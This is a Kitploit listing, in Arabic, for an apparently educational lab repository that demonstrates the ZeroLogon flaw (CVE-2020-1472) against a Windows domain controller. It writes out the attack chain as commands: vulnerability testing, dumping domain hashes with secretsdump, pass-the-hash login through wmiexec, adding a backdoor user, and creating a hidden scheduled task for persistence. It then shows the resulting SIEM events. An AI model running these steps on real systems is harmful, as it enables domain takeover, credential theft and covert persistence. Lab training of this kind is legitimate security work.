Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ZeroLogon-CVE-2020-1472-lab — شرح وتوضيح لثغرة ZeroLogon (CVE-2020-1472) | Kitploit
أدوات/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
تصعيد الامتيازاتهجمات كلمات المرورآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالCTFاختبار الاختراقالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
مختبرات وتدريب عملي
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

شرح وتوضيح لثغرة ZeroLogon (CVE-2020-1472)

عرض المستودع
3منذ 11 أشهرلم تتم المراجعة بعد

ZeroLogon-CVE-2020-1472

شرح وإظهار الثغرة الأمنية ZeroLogon (CVE-2020-1472)

الهدف من هذا المختبر هو تعليمي بحت. لا يُنصح بتنفيذه في بيئات إنتاجية أو بيئات لا تملكها.

حول الثغرة الأمنية

سياق الثغرة الأمنية

تسمح هذه الثغرة الأمنية لمجرم إلكتروني بالسيطرة على وحدة تحكم المجال (DC). يتم ذلك عن طريق تغيير أو إزالة كلمة مرور حساب خدمة على وحدة التحكم. يمكن للجهة الخبيثة ببساطة التسبب في رفض الخدمة أو السيطرة على الشبكة بأكملها. في أغسطس 2020، أصدرت مايكروسوفت تحديثًا أمنيًا.

  • الشدة: 10.0 (حرجة) (CVSS v3.1)

المكون المتأثر: بروتوكول Netlogon عن بعد من مايكروسوفت (MS-NRPC)

إصدارات ويندوز المتأثرة:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • الإصدارات السابقة لتحديث أغسطس/سبتمبر 2020

المتطلبات

استنساخ المستودعات

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - اختبار إذا كان الخادم الهدف معرضًا للثغرة

إذا كنت ستقوم بالتشغيل محليًا!

  • تحميل Kali Linux
  • تحميل Windows Server 2008 R2 المعرض للثغرة
  • Virtualbox

على AWS أيضًا ممكن مع هذه الصور (احذر من الفوترة)

  • ويندوز معرض للثغرة - AMI من المجتمع921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - AMI من السوق

إضافي: حساب على Wazuh لتحليل أحداث SIEM.

  • Wazuh Cloud مع نسخة تجريبية لمدة 14 يومًا

كيفية الاستغلال

تلميح: في Kali Linux، خدمة SSH تكون معطلة افتراضيًا — من الضروري تشغيلها يدويًا.

قبل اختبار ما إذا كان الخادم معرضًا للثغرة، يمكننا استخدام nmap لمعرفة المنافذ المفتوحة:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
لقطة شاشة 2025-10-10 الساعة 09 34 13

باستخدام CVE-2020-1472 - اختبار إذا كان الخادم الهدف معرضًا للثغرة. نفّذ الأمر:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
لقطة شاشة 2025-10-04 الساعة 20 14 40

أداة secretdump هي مجموعة أدوات من Impacket

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
لقطة شاشة 2025-10-04 الساعة 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
لقطة شاشة 2025-10-04 الساعة 20 27 05

إذا سار كل شيء على ما يرام، سنتمكن من تسجيل الدخول باستخدام الهاش ما هي هجمات تمرير الهاش؟

لقطة شاشة 2025-10-04 الساعة 20 30 39

الآن فقط قم بإنشاء استمرارية! يمكن أن يكون مستخدمًا جديدًا!

root@kitploit:~
net user coringa Batman2025 /add
لقطة شاشة 2025-10-04 الساعة 20 36 09

تم! تم إنشاء المستخدم بنجاح!

لقطة شاشة 2025-10-04 الساعة 20 38 04

من الممكن أيضًا إنشاء مهمة!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# سكريبت النسخ الاحتياطي'\"" /SC ONLOGON /RL HIGHEST /F
لقطة شاشة 2025-10-10 الساعة 10 17 17 لقطة شاشة 2025-10-10 الساعة 10 20 33

الأحداث في SIEM

من الممكن رؤية إنشاء المستخدمين والأحداث المتعلقة بـ تمرير الهاش وإنشاء المستخدمين!

2025-10-06_10-08-10 2025-10-06_10-09-06

المراجع

  • Zerologon (CVE-2020-1472): تصعيد صلاحيات غير مصادق إلى صلاحية مجال كاملة
  • ما هو Zerologon؟
  • [MS-NRPC]: بروتوكول Netlogon عن بعد
  • تفاصيل CVE-2020-1472
  • ZeroLogon-CVE-2020-1472 - مختبر على يوتيوب
  • هجوم تمرير الهاش
  • المزيد عن Impacket
تنزيل الأداة